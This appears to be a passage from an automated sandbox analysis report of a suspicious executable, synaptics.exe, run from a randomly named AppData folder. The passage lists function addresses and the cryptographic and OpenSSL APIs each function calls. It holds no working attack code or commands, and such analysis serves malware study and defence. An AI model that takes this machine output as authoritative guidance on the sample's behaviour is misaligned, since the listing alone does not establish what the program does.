                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6B4E0 memset,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,InitOnceBeginInitialize,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,InitOnceBeginInitialize,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,free,free,free,24_2_6BF6B4E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF610D0 ??4PyCRYPTHASH@@QAEAAV0@ABV0@@Z,24_2_6BF610D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF648C0 ??0PyCRYPTPROV@@QAE@K@Z,_Py_NewReference,24_2_6BF648C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF610C0 ?GetHCRYPTHASH@PyCRYPTHASH@@QAEKXZ,24_2_6BF610C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6B8A0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QAE@XZ,free,24_2_6BF6B8A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF648A0 CryptReleaseContext,24_2_6BF648A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64870 ?deallocFunc@PyCRYPTPROV@@SAXPAU_object@@@Z,CryptReleaseContext,24_2_6BF64870
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64860 ??1PyCRYPTPROV@@QAE@XZ,CryptReleaseContext,24_2_6BF64860
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF69850 PyArg_ParseTupleAndKeywords,PyBytes_AsString,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyLong_AsLong,PyErr_Occurred,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,PyArg_ParseTuple,PyEval_SaveThread,CryptFindOIDInfo,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,24_2_6BF69850
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF63850 ?PyCryptHashSessionKey@PyCRYPTHASH@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,CryptHashSessionKey,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,24_2_6BF63850
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64440 ?PyCryptDecrypt@PyCRYPTKEY@@SAPAU_object@@PAU2@00@Z,_Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,malloc,PyErr_NoMemory,??1PyWinBufferView@@QAE@XZ,memcpy,CryptDecrypt,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF64440
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF68C20 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,CryptSetProviderExW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,24_2_6BF68C20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF64020 ?PyCryptGetKeyParam@PyCRYPTKEY@@SAPAU_object@@PAU2@00@Z,PyArg_ParseTupleAndKeywords,CryptGetKeyParam,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,CryptGetKeyParam,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,Py_BuildValue,PyBytes_FromStringAndSize,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,free,24_2_6BF64020
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE20F0 OCB_decrypt,24_2_6BFE20F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE2670 OCB_transcrypt,_wassert,24_2_6BFE2670
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BFE23B0 OCB_encrypt,24_2_6BFE23B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C031D10 Salsa20_stream_encrypt,24_2_6C031D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0820B0 CTR_encrypt,24_2_6C0820B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C081D60 CTR_decrypt,24_2_6C081D60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5F86C0 _PyOS_URandom,PyErr_Format,CryptAcquireContextW,PyErr_SetExcFromWindowsErrWithFilenameObjects,CryptGenRandom,27_2_6C5F86C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C5F8750 _PyOS_URandomNonblock,PyErr_Format,CryptAcquireContextW,PyErr_SetExcFromWindowsErrWithFilenameObjects,CryptGenRandom,27_2_6C5F8750
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E161F00 CFB_encrypt,_wassert,memmove,memmove,27_2_6E161F00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E161D50 CFB_decrypt,_wassert,memmove,memmove,27_2_6E161D50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E381D30 ECB_decrypt,27_2_6E381D30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6E381D60 ECB_encrypt,27_2_6E381D60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F848FA0 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F848FA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F852FD0 CRYPTO_strdup,27_2_6F852FD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841B9A EVP_MD_CTX_new,EVP_PKEY_new,EVP_PKEY_assign,EVP_PKEY_security_bits,DH_free,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_pqg,DH_get0_key,EVP_PKEY_get1_tls_encodedpoint,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,EVP_PKEY_size,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_free,27_2_6F841B9A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8421C6 CRYPTO_free,27_2_6F8421C6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8412C1 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,X509_free,OPENSSL_sk_pop_free,27_2_6F8412C1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F880EA0 EVP_PKEY_free,EVP_PKEY_get0_DH,DH_get0_key,BN_num_bits,BN_bn2bin,EVP_PKEY_free,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free,CRYPTO_clear_free,27_2_6F880EA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CEF0 CRYPTO_free,CRYPTO_malloc,ERR_put_error,memmove,27_2_6F86CEF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F876E50 CRYPTO_memcmp,27_2_6F876E50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84CE60 CRYPTO_free,27_2_6F84CE60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F866D80 ERR_put_error,EVP_MD_size,ERR_put_error,CRYPTO_zalloc,ERR_put_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memmove,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,d2i_X509,X509_get0_pubkey,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,27_2_6F866D80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CD90 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,27_2_6F86CD90
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F864DA0 CRYPTO_memdup,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F864DA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F854DD0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,SSL_SRP_CTX_free,CRYPTO_clear_free,27_2_6F854DD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84252C CONF_parse_list,CRYPTO_malloc,ERR_put_error,memmove,CRYPTO_free,CRYPTO_free,27_2_6F84252C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F892DF0 BN_bin2bn,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free,27_2_6F892DF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F860D10 ERR_put_error,CRYPTO_free,CRYPTO_strdup,27_2_6F860D10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F876C80 CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F876C80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CCC0 CRYPTO_set_ex_data,27_2_6F86CCC0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CC00 CRYPTO_free,CRYPTO_memdup,27_2_6F86CC00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8417DF CRYPTO_memcmp,memchr,CRYPTO_free,27_2_6F8417DF
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8421EE CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F8421EE
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F866C40 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error,27_2_6F866C40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84241E EVP_MD_size,EVP_CIPHER_iv_length,EVP_CIPHER_key_length,CRYPTO_clear_free,CRYPTO_malloc,27_2_6F84241E
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8416A9 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,27_2_6F8416A9
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F866B80 CRYPTO_free,CRYPTO_free,27_2_6F866B80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841843 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,27_2_6F841843
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F886BF0 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,memmove,memmove,27_2_6F886BF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8414FB CRYPTO_free,CRYPTO_malloc,27_2_6F8414FB
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8423F6 CRYPTO_free,CRYPTO_malloc,27_2_6F8423F6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F898A80 CRYPTO_free,CRYPTO_malloc,ERR_put_error,27_2_6F898A80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841519 CRYPTO_malloc,27_2_6F841519
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CAB0 CRYPTO_free,CRYPTO_strdup,27_2_6F86CAB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88AA00 EVP_MD_CTX_new,EVP_MD_CTX_copy_ex,EVP_MD_CTX_free,CRYPTO_memcmp,memmove,memmove,27_2_6F88AA00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86CA10 CRYPTO_free,CRYPTO_memdup,27_2_6F86CA10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F876A20 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F876A20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F866A60 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error,27_2_6F866A60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F870980 CRYPTO_zalloc,CRYPTO_free,27_2_6F870980
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841901 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,27_2_6F841901
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85E9EC OPENSSL_init_crypto,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,27_2_6F85E9EC
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8414A1 CRYPTO_free,CRYPTO_memdup,27_2_6F8414A1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A930 CRYPTO_THREAD_run_once,27_2_6F85A930
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84105F SSL_CTX_remove_session,SSL_SESSION_free,_time64,CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,CRYPTO_free,27_2_6F84105F
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841B36 SRP_Verify_A_mod_N,SRP_Calc_u,SRP_Calc_server_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,27_2_6F841B36
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841492 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,27_2_6F841492
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86C8E0 OPENSSL_init_ssl,CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,27_2_6F86C8E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84C830 CRYPTO_free,27_2_6F84C830
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F860860 CRYPTO_set_ex_data,27_2_6F860860
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84C870 CRYPTO_free,27_2_6F84C870
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F860870 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,27_2_6F860870
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841546 CRYPTO_free,27_2_6F841546
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841807 CRYPTO_malloc,ERR_put_error,memmove,CRYPTO_free,CRYPTO_free,27_2_6F841807
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F854789 ERR_put_error,CRYPTO_free,CRYPTO_strdup,27_2_6F854789
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841109 CRYPTO_malloc,ERR_put_error,CRYPTO_free,27_2_6F841109
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841302 CRYPTO_free,27_2_6F841302
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8807C0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,27_2_6F8807C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8415E6 CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup,27_2_6F8415E6
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F892710 CRYPTO_zalloc,memmove,SSL_get_options,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F892710
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A730 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl,27_2_6F85A730
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F884730 CRYPTO_free,CRYPTO_free,CRYPTO_strndup,27_2_6F884730
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A680 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl,27_2_6F85A680
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89C680 SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,CRYPTO_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,27_2_6F89C680
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86C690 CRYPTO_get_ex_data,27_2_6F86C690
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84137A EVP_MD_size,SSL_SESSION_free,RAND_bytes,_time64,CRYPTO_free,CRYPTO_memdup,27_2_6F84137A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8546C3 CRYPTO_free,CRYPTO_strdup,ERR_put_error,ERR_put_error,27_2_6F8546C3
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8626D0 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,SSL_SESSION_free,SSL_SESSION_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,SSL_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SSL_CTX_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,27_2_6F8626D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84208B CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,27_2_6F84208B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F842117 CRYPTO_zalloc,CRYPTO_free,27_2_6F842117
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8565A0 ASN1_item_d2i,SSL_SESSION_new,ERR_put_error,ASN1_item_free,SSL_SESSION_free,_time64,X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ASN1_item_free,27_2_6F8565A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8445E0 BIO_get_data,BIO_get_shutdown,SSL_shutdown,BIO_get_init,SSL_free,BIO_clear_flags,BIO_set_init,CRYPTO_free,27_2_6F8445E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87E501 CRYPTO_free,CRYPTO_free,27_2_6F87E501
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F886500 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memmove,27_2_6F886500
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A560 ERR_put_error,memmove,OPENSSL_sk_push,CRYPTO_free,27_2_6F85A560
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F848570 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F848570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84E570 EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,27_2_6F84E570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F844570 CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags,27_2_6F844570
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841311 SSL_SESSION_free,memset,SSL_CIPHER_find,SSL_SESSION_new,SSL_SESSION_set1_master_key,SSL_SESSION_set_cipher,SSL_SESSION_set_protocol_version,OPENSSL_cleanse,SSL_SESSION_free,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,CRYPTO_memcmp,27_2_6F841311
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8804C0 X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_PKEY_CTX_free,27_2_6F8804C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84111D EVP_CIPHER_iv_length,EVP_CIPHER_key_length,CRYPTO_malloc,27_2_6F84111D
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841979 CONF_parse_list,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F841979
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86C420 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,27_2_6F86C420
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88E420 CRYPTO_malloc,RAND_bytes,27_2_6F88E420
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8483A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F8483A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8983B0 ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F8983B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841F0A CRYPTO_free,27_2_6F841F0A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841190 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memmove,ERR_put_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_malloc,memmove,CRYPTO_malloc,memmove,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,27_2_6F841190
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8763D0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F8763D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8603F0 CRYPTO_memdup,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F8603F0
